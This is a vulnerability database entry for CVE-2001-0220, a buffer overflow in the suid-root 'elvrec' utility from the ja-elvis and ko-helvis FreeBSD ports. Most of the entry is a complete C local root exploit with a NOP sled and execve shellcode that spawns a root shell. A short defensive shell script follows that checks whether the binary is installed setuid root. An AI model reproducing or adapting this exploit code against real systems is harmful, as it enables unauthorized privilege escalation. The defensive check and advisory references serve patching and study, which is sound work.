elvis ja-elvis and ko-elvis ports buffer overflow vulnerability (elvis ja-elvis / ko-helvis)

Vulnerability ID: 1106240    Type: buffer overflow
Published: 2001-03-03    Updated: 2001-06-02
CVE ID: CVE-2001-0220
CNNVD ID: CNNVD-200106-007
Platform: BSD    CVSS score: 7.2
|Sources
https://www.exploit-db.com/exploits/287
https://www.securityfocus.com/bid/83022
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200106-007
|Vulnerability details
The ja-elvis and ko-helvis ports of elvis contain a buffer overflow. A local user can exploit it to obtain root privileges.
|Exploit
/*
 * ja-elvis & ko-helvis - FreeBSD 3.5.1 & 4.2 ports package local root exploit
 *
 * vulnerable: versions prior to ja-elvis-1.8.4_1 and ko-helvis-1.8h2_1
 *
 * The above two packages contain a file recovery utility 'elvrec', installed
 * suid root(4755) by default. The utility is subject to a buffer overflow
 * leading to root privileges:
 *
 * Usage: ./elvwreck <offset> <alignment>
 *
 * [email protected] // www.synnergy.net
 * 28 Feb 2001.
 *
 */

#include <stdio.h>
#include <stdlib.h>
#include <string.h>	/* strlen, memcpy */
#include <unistd.h>	/* execlp */

#define PROG	"/usr/local/bin/elvrec"
#define VULN	608		/* bytes of return-address padding before the NOP sled */
#define BSIZE	1024		/* total length of the argument handed to elvrec */
#define NOP	0x90
#define ESP	0xbfbff92c	// FreeBSD 4.2
#define OFFSET	0
#define EATME	1		// byte alignment

/* FreeBSD execve() shellcode that runs /bin/sh; the '.' separators in the
 * trailing string are overwritten with NUL bytes at run time, so the payload
 * itself contains no zero bytes. */
char shellcode[]=
  "\xeb\x37\x5e\x31\xc0\x88\x46\xfa\x89\x46\xf5\x89\x36\x89\x76"
  "\x04\x89\x76\x08\x83\x06\x10\x83\x46\x04\x18\x83\x46\x08\x1b"
  "\x89\x46\x0c\x88\x46\x17\x88\x46\x1a\x88\x46\x1d\x50\x56\xff"
  "\x36\xb0\x3b\x50\x90\x9a\x01\x01\x01\x01\x07\x07\xe8\xc4\xff"
  "\xff\xff\x02\x02\x02\x02\x02\x02\x02\x02\x02\x02\x02\x02\x02"
  "\x02\x02\x02/bin/sh.-c.sh";

int main(int argc, char *argv[]) {
  char buffer[BSIZE];
  long address=ESP;	/* assumes a 32-bit long, as on FreeBSD 4.2/i386 */
  int i, offset, align;

  /* both arguments are required; otherwise fall back to the built-in defaults */
  if(argc > 2) { offset = atoi(argv[1]); align = atoi(argv[2]); }
  else { offset = OFFSET; align = EATME; }

  address += offset;
  fprintf(stderr, "\n* using ret %#lx -> align %d -> offset %d\n\n", address, align, offset);

  /* first VULN bytes: the guessed return address, repeated at the given alignment */
  for(i=align; i<VULN; i+=4){ *(long *)&buffer[i] = address; }
  /* then a NOP sled, followed by the shellcode */
  for(i=VULN; i<(int)(BSIZE - strlen(shellcode) - 100); i++){ buffer[i] = NOP; }
  memcpy(buffer+i, shellcode, strlen(shellcode));
  buffer[BSIZE - 1] = '\0';	/* terminate inside the array (the original wrote one byte past it) */

  if(execlp(PROG, "elvrec", buffer, (char *)NULL) == -1) {
    fprintf(stderr, "Unable to execute %s\n\n", PROG);
    exit(1);
  }
  return 0;
}


// milw0rm.com [2001-03-03]
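The exploit above only works because elvrec is installed setuid root. The following POSIX sh check is an added example (not from the advisory, the ports or the exploit author): it reports whether a binary is still installed setuid-root, defaulting to the path the exploit uses; ELVREC_PATH, check_suid_root and report_elvrec are names chosen here.

```shell
#!/bin/sh
# Added example: report whether a file is installed setuid and owned by root,
# the install condition (4755, root-owned) that turns the elvrec overflow into
# a local root issue. ELVREC_PATH defaults to the path named in the exploit.
ELVREC_PATH="${ELVREC_PATH:-/usr/local/bin/elvrec}"

# check_suid_root PATH
#   returns 0 when PATH is setuid and owned by root (exposed; mode is printed),
#   1 when PATH exists but is not setuid-root, 2 when PATH does not exist.
check_suid_root() {
    path="$1"
    [ -e "$path" ] || return 2
    # -prune keeps find from descending if a directory is passed by mistake;
    # -perm -4000 -user root matches the root-owned 4755 install described above.
    if [ -n "$(find "$path" -prune -perm -4000 -user root -print 2>/dev/null)" ]; then
        ls -l "$path"
        return 0
    fi
    return 1
}

# report_elvrec: human-readable verdict for the elvrec path.
report_elvrec() {
    rc=0
    check_suid_root "$ELVREC_PATH" || rc=$?
    case $rc in
        0) echo "EXPOSED: $ELVREC_PATH is setuid root; upgrade the port or strip the setuid bit (chmod u-s)";;
        1) echo "OK: $ELVREC_PATH is present but not setuid root";;
        2) echo "OK: $ELVREC_PATH is not installed";;
    esac
    return $rc
}
```

Run it as `report_elvrec` on the host after upgrading the port, or point ELVREC_PATH at any other setuid candidate.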
|Affected products
Ko-Helvis Ko-Helvis 1.8H2 1

Ja-Elvis Ja-Elvis 1.8.4 1

|References

Source: FREEBSD
Name: FreeBSD-SA-01:21
Link: http://archives.neohapsis.com/archives/freebsd/2001-02/0082.html
